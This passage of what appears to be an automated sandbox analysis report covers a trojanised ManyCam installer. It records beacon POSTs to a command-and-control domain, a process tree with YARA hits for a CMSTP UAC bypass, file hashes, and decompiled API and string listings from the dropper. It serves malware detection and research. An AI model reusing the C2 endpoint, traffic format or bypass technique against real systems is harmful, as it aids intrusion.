2024-10-19 17:54:08 UTC	425	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 id: aIe1tydvsnmUv2rmxSzd0L7Tsq1JAN/GbefAZszVmFZV6yyv0M2o6SoMX6fUHx50n0S5 Content-Length: 35 Host: nocaryesmoto1.website
2024-10-19 17:54:08 UTC	35	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-10-19 17:54:08 UTC	713	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:08 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YdZaBgQnz%2BlrFZb4%2BUIfboVB3yXk9eBmXChI2OZJHm948YDzzC85CqzuovMkeo9GeuUfQ34gf7lBEaa8jxHivmxdTaKW%2BpcamAmnoJzdUfTbHW46Ph9sw9t%2FjHD3jHms5OqOqh156wI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a1b3491e4768-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1012&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=2659320&cwnd=245&unsent_bytes=0&cid=7183cacc31b0a1cd&ts=404&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49946	188.114.97.3	443	7776	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-19 17:54:35 UTC	351	OUT	POST /Scoreboard-10-2.html?gyqtjtyk3dtxh=siD2NpNyBsa1XljFEWgw6Zp36eo9C1Pr5GT55lc8%2FgM8DTQUy5L5Pe78r1XOmRYOiEne9u%2FKtKCDrSAnBl74FA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Content-Length: 96 Host: nocaryesmoto1.website
2024-10-19 17:54:35 UTC	96	OUT	Data Raw: 03 00 00 00 fd ff ff ff 00 00 00 00 00 00 00 00 92 00 00 2d 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-10-19 17:54:36 UTC	719	IN	HTTP/1.1 204 No Content Date: Sat, 19 Oct 2024 17:54:36 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZ1lkGkv5tUhvpB2HdiT%2FAhAimQet1RTbyNf%2FTn1au%2BO1wNHoEWy2NhGhnVtCQFImXJtYsT2I8z0%2FzZLjtA8lqXwLE3MTMrNEJntk3%2BY06X%2FH8M%2BneuywqJKH2IqPkSYoPPhjYmG26I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d52a25ec9a52893-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1388&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1083&delivery_rate=2002766&cwnd=245&unsent_bytes=0&cid=7bcf59f28702aeb0&ts=495&x=0"

Target ID:	0
Start time:	13:53:00
Start date:	19/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff6ef6b0000
File size:	5'963'808 bytes
MD5 hash:	B55B503A690229F094EC6C9017145104
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:53:01
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.1717306561.0000000004BA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:53:01
Start date:	19/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Temp\RarSFX0\ManyCam.exe"
Imagebase:	0x7ff74c380000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:53:02
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1772936818.00000000046CB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:53:02
Start date:	19/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Imagebase:	0x7ff74c380000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:53:03
Start date:	19/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.2082750031.0000000005623000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:53:03
Start date:	19/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	13:53:31
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.2371124217.000000000263A000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	13:53:40
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2154639347.00000000046B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	13:53:40
Start date:	19/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Imagebase:	0x7ff74c380000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	13:53:40
Start date:	19/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2200232630.0000000004AC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2199897817.0000000002B20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:53:40
Start date:	19/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	13:53:50
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.2257486002.00000000046C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:53:50
Start date:	19/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\EH_Monitor_test\ManyCam.exe"
Imagebase:	0x7ff74c380000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:53:51
Start date:	19/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.2464509110.0000000005666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:53:51
Start date:	19/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:54:08
Start date:	19/10/2024
Path:	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Rzu_channel_debug.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2656492685.0000000002701000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	13%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.4%
Total number of Nodes:	1825
Total number of Limit Nodes:	31

Executed Functions

Function 00007FF6EF6C5008 Relevance: 154.4, APIs: 22, Strings: 66, Instructions: 364
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6EF6C5050
GetProcAddress.KERNEL32 ref: 00007FF6EF6C5068
GetProcAddress.KERNEL32 ref: 00007FF6EF6C5095
GetModuleFileNameW.KERNEL32 ref: 00007FF6EF6C53CD
CreateFileW.KERNEL32 ref: 00007FF6EF6C53F8
SetFilePointer.KERNEL32 ref: 00007FF6EF6C5416
ReadFile.KERNEL32 ref: 00007FF6EF6C543A
CloseHandle.KERNEL32 ref: 00007FF6EF6C54A0
CompareStringW.KERNELBASE ref: 00007FF6EF6C5515
GetFileAttributesW.KERNELBASE ref: 00007FF6EF6C553F
GetFileAttributesW.KERNEL32 ref: 00007FF6EF6C558C
GetModuleFileNameW.KERNEL32 ref: 00007FF6EF6C54B2

Part of subcall function 00007FF6EF6C4F90: GetSystemDirectoryW.KERNEL32(00000000,00007FF6EF6C3830), ref: 00007FF6EF6C4FBE

Part of subcall function 00007FF6EF6BEB40: GetVersionExW.KERNEL32 ref: 00007FF6EF6BEB71

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C5614
ExitProcess.KERNEL32 ref: 00007FF6EF6C56D4

Part of subcall function 00007FF6EF6C4F90: LoadLibraryExW.KERNELBASE ref: 00007FF6EF6C4FE9

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C566D
AllocConsole.KERNEL32 ref: 00007FF6EF6C5672
GetCurrentProcessId.KERNEL32 ref: 00007FF6EF6C567C
AttachConsole.KERNEL32 ref: 00007FF6EF6C5684
GetStdHandle.KERNEL32 ref: 00007FF6EF6C569E
WriteConsoleW.KERNEL32 ref: 00007FF6EF6C56BB
Sleep.KERNEL32 ref: 00007FF6EF6C56C6
FreeConsole.KERNEL32 ref: 00007FF6EF6C56CC

Strings

cryptui.dll, xrefs: 00007FF6EF6C51CC
dhcpcsvc.dll, xrefs: 00007FF6EF6C533C
XmlLite.dll, xrefs: 00007FF6EF6C534A
DXGIDebug.dll, xrefs: 00007FF6EF6C50BF, 00007FF6EF6C5496, 00007FF6EF6C554A
slc.dll, xrefs: 00007FF6EF6C5245
RpcRtRemote.dll, xrefs: 00007FF6EF6C5374
dnsapi.DLL, xrefs: 00007FF6EF6C525B
secur32.dll, xrefs: 00007FF6EF6C51ED
kernel32, xrefs: 00007FF6EF6C5046
aclui.dll, xrefs: 00007FF6EF6C5382
clbcatq.dll, xrefs: 00007FF6EF6C5127
netutils.dll, xrefs: 00007FF6EF6C5291
userenv.dll, xrefs: 00007FF6EF6C5195
wkscli.dll, xrefs: 00007FF6EF6C52F6
uxtheme.dll, xrefs: 00007FF6EF6C55D4
ws2help.dll, xrefs: 00007FF6EF6C5148
shell32.dll, xrefs: 00007FF6EF6C51E2
comres.dll, xrefs: 00007FF6EF6C5132
devrtl.dll, xrefs: 00007FF6EF6C52AD
mlang.dll, xrefs: 00007FF6EF6C52CC
ntmarta.dll, xrefs: 00007FF6EF6C520E
samlib.dll, xrefs: 00007FF6EF6C52E8
oleaccrc.dll, xrefs: 00007FF6EF6C5203
iphlpapi.DLL, xrefs: 00007FF6EF6C5269
sfc_os.dll, xrefs: 00007FF6EF6C50C6
crypt32.dll, xrefs: 00007FF6EF6C51B6
dwmapi.dll, xrefs: 00007FF6EF6C50FB, 00007FF6EF6C55C8
imageres.dll, xrefs: 00007FF6EF6C5250
SetDefaultDllDirectories, xrefs: 00007FF6EF6C508B
usp10.dll, xrefs: 00007FF6EF6C511C
mpr.dll, xrefs: 00007FF6EF6C529F
browcli.dll, xrefs: 00007FF6EF6C5312
atl.dll, xrefs: 00007FF6EF6C5174
SSPICLI.DLL, xrefs: 00007FF6EF6C50D7
UXTheme.dll, xrefs: 00007FF6EF6C50EF
psapi.dll, xrefs: 00007FF6EF6C5153
shdocvw.dll, xrefs: 00007FF6EF6C51AB
lpk.dll, xrefs: 00007FF6EF6C5111
msasn1.dll, xrefs: 00007FF6EF6C51C1
propsys.dll, xrefs: 00007FF6EF6C52BE
linkinfo.dll, xrefs: 00007FF6EF6C5358
samcli.dll, xrefs: 00007FF6EF6C52DA
cscapi.dll, xrefs: 00007FF6EF6C523A
cryptsp.dll, xrefs: 00007FF6EF6C5366
cryptbase.dll, xrefs: 00007FF6EF6C5106
cabinet.dll, xrefs: 00007FF6EF6C51F8
ntshrui.dll, xrefs: 00007FF6EF6C5169
ieframe.dll, xrefs: 00007FF6EF6C515E
WindowsCodecs.dll, xrefs: 00007FF6EF6C5224
dfscli.dll, xrefs: 00007FF6EF6C5304
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00007FF6EF6C564E
setupapi.dll, xrefs: 00007FF6EF6C517F
wintrust.dll, xrefs: 00007FF6EF6C51D7
netapi32.dll, xrefs: 00007FF6EF6C51A0
SetDllDirectoryW, xrefs: 00007FF6EF6C505E
version.dll, xrefs: 00007FF6EF6C50B3
peerdist.dll, xrefs: 00007FF6EF6C539E
srvcli.dll, xrefs: 00007FF6EF6C522F
apphelp.dll, xrefs: 00007FF6EF6C518A
rasadhlp.dll, xrefs: 00007FF6EF6C5320
dsrole.dll, xrefs: 00007FF6EF6C5390
rsaenh.dll, xrefs: 00007FF6EF6C50E3
dhcpcsvc6.dll, xrefs: 00007FF6EF6C532E
profapi.dll, xrefs: 00007FF6EF6C5219
ws2_32.dll, xrefs: 00007FF6EF6C513D
WINNSI.DLL, xrefs: 00007FF6EF6C5277

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcessswprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemVersionWrite
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
API String ID: 2569216850-2013832382
Opcode ID: 83a22a6426816d11a286af88b89cc0ecc99be97fd8948fd6c2f908e0dfb38e53
Instruction ID: 5a40b1cfcb5b9ad1cdaa3b934bb43dc22b39b555001e9f3fd6cc5e42f4521abf
Opcode Fuzzy Hash: 83a22a6426816d11a286af88b89cc0ecc99be97fd8948fd6c2f908e0dfb38e53
Instruction Fuzzy Hash: D512CB37A05B429BEB219F20EC402E933ACFB44758F501236D95D8A7A4EF3EE658D345

Function 00007FF6EF6D23F0 Relevance: 100.4, APIs: 47, Strings: 10, Instructions: 685
windowfilesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6EF6B13D0: GetDlgItem.USER32 ref: 00007FF6EF6B1420
Part of subcall function 00007FF6EF6B13D0: SetWindowTextW.USER32 ref: 00007FF6EF6B143C

SetDlgItemTextW.USER32 ref: 00007FF6EF6D251C
GetMessageW.USER32 ref: 00007FF6EF6D2548
IsDialogMessageW.USER32 ref: 00007FF6EF6D255D
TranslateMessage.USER32 ref: 00007FF6EF6D256B
DispatchMessageW.USER32 ref: 00007FF6EF6D2575
GetDlgItemTextW.USER32 ref: 00007FF6EF6D2595
EndDialog.USER32 ref: 00007FF6EF6D25C1
GetDlgItem.USER32 ref: 00007FF6EF6D25EB
SendMessageW.USER32 ref: 00007FF6EF6D260F
SendMessageW.USER32 ref: 00007FF6EF6D2627

Part of subcall function 00007FF6EF6D44A4: wcscpy.LIBCMT ref: 00007FF6EF6D4520

Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29CF
Part of subcall function 00007FF6EF6C2948: LoadStringW.USER32 ref: 00007FF6EF6C29E8

SetFocus.USER32 ref: 00007FF6EF6D2630
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D268A
GetLastError.KERNEL32 ref: 00007FF6EF6D26F1
GetLastError.KERNEL32 ref: 00007FF6EF6D2715
GetTickCount.KERNEL32 ref: 00007FF6EF6D2733
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D274A
GetLastError.KERNEL32 ref: 00007FF6EF6D2779
GetModuleFileNameW.KERNEL32 ref: 00007FF6EF6D27C2
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D2807
CreateFileMappingW.KERNEL32 ref: 00007FF6EF6D2878
GetCommandLineW.KERNEL32 ref: 00007FF6EF6D2891
MapViewOfFile.KERNEL32 ref: 00007FF6EF6D290D
ShellExecuteExW.SHELL32 ref: 00007FF6EF6D2934
WaitForInputIdle.USER32 ref: 00007FF6EF6D296B
Sleep.KERNEL32 ref: 00007FF6EF6D297E
UnmapViewOfFile.KERNEL32 ref: 00007FF6EF6D29A3
CloseHandle.KERNEL32 ref: 00007FF6EF6D29AC
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D29E4
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2A5A
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2A7F
GetDlgItem.USER32 ref: 00007FF6EF6D2A8D
GetWindowLongPtrW.USER32 ref: 00007FF6EF6D2AA7
SetWindowLongPtrW.USER32 ref: 00007FF6EF6D2ABB
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2B95
swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6D2C10
SendMessageW.USER32 ref: 00007FF6EF6D2C66
SendDlgItemMessageW.USER32 ref: 00007FF6EF6D2C8D
GetDlgItem.USER32 ref: 00007FF6EF6D2C9B
SendMessageW.USER32 ref: 00007FF6EF6D2CB5
GetDlgItem.USER32 ref: 00007FF6EF6D2CD4
SetWindowTextW.USER32 ref: 00007FF6EF6D2CFA
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2D7A
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2D92
DialogBoxParamW.USER32 ref: 00007FF6EF6D2E55
EnableWindow.USER32 ref: 00007FF6EF6D2F4C
SendMessageW.USER32 ref: 00007FF6EF6D2F9E
SetDlgItemTextW.USER32 ref: 00007FF6EF6D2FC7

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 00007FF6EF6D27F4
p, xrefs: 00007FF6EF6D280C
@, xrefs: 00007FF6EF6D2814
winrarsfxmappingfile.tmp, xrefs: 00007FF6EF6D2855
LICENSEDLG, xrefs: 00007FF6EF6D2E47
__tmp_rar_sfx_access_check_%u, xrefs: 00007FF6EF6D273C
"%s"%s, xrefs: 00007FF6EF6D29D1
STARTDLG, xrefs: 00007FF6EF6D2438
runas, xrefs: 00007FF6EF6D2821
%s, xrefs: 00007FF6EF6D2C06

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Item$MessageText$Send$Windowswprintf$File$DialogErrorLast$LoadLongStringView$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWaitwcscpy
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$p$runas$winrarsfxmappingfile.tmp
API String ID: 3949765048-4012663800
Opcode ID: 469945c3df918f4ac9347a7c8e9f7e944882380b4926574b273706e04d0c3fbb
Instruction ID: 7d798e5fdfe4beb07c27a0ed428115e9eea43162d875b5fe0024222d5086c3bd
